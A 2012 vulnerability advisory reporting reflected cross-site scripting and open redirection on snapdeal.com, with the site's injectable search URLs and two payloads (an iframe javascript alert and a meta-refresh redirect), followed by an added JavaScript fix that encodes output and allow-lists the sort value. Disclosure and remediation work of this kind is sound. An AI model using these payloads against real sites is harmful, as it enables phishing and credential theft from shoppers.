
Snapdeal.com Cross Site Scripting / Redirection

Posted on 31 May 2012

Site: http://www.snapdeal.com
Threat/Vulnerability: Cross-site scripting a.k.a. XSS, URL Redirection
Severity: Moderate
Author: Karthik R a.k.a. 3psil0nlambda

I have informed the owner (CEO) but got no response or acknowledgement of receipt of the mail.

About the Site: India's fastest growing shopping site.

Vulnerability:
* XSS a.k.a. cross-site scripting
* URL Redirection

Once the vulnerability is found, it can be used in the URLs below to create attacks:
* Installing malware in the name of Snapdeal.com and gaining credit card and other important credentials
* Phishing URL redirection to gain login IDs and passwords

URLs used for crafting attacks:
* http://www.snapdeal.com/search?categoryId=0&keyword= <inject XSS attack here> &vertical=all&clickSrc=go_recent&locId=0
* http://www.snapdeal.com/products/lifestyle-handbags-wallets?q=Brand:Jute Planet,A-maze&sort= <inject XSS attack here>

Exploit:
* XSS: "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>
* URL Redirection: "><meta HTTP-EQUIV="REFRESH" content="0; url=EVIL URL">

Greetz to side-effects, r4dc0re, lord crusader, team inject0r
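Added example, not part of the original advisory and not Snapdeal's code: a server-side fix for the two reflected parameters named above, HTML-encoding `keyword` and allow-listing `sort`. It assumes the values are reflected into a double-quoted HTML attribute (suggested by the `">` prefix of both payloads); `renderSearchForm`, `safeSort` and the sort keys are hypothetical names.

```javascript
// Assumption: `keyword` and `sort` are echoed into value="..." attributes.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can close an attribute or open a tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical allow-list: a sort key is an enum, so free text is never echoed.
const ALLOWED_SORTS = new Set(['relevance', 'price_asc', 'price_desc', 'newest']);

function safeSort(value) {
  return ALLOWED_SORTS.has(value) ? value : 'relevance';
}

// Render the search form from a raw query string with both defences applied.
function renderSearchForm(queryString) {
  const params = new URLSearchParams(queryString);
  const keyword = params.get('keyword') ?? '';
  const sort = safeSort(params.get('sort') ?? '');
  return '<form action="/search">' +
    `<input type="text" name="keyword" value="${escapeHtml(keyword)}">` +
    `<input type="hidden" name="sort" value="${sort}">` +
    '</form>';
}

// The two strings published in the advisory, used here as regression inputs.
const PAGE_PAYLOADS = [
  `"><IFRAME SRC="javascript:alert('XSS');"></IFRAME>`,
  `"><meta HTTP-EQUIV="REFRESH" content="0; url=EVIL URL">`,
];

// Feed each payload through both parameters and return the rendered markup.
function renderPagePayloads() {
  return PAGE_PAYLOADS.map((p) => {
    const q = `keyword=${encodeURIComponent(p)}&sort=${encodeURIComponent(p)}`;
    return renderSearchForm(q);
  });
}

for (const html of renderPagePayloads()) {
  console.log(html); // payload appears only as inert, encoded text
}
```

Encoding at output handles the attribute context only; a value placed inside a script block or a URL attribute needs the encoder for that context instead.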

 
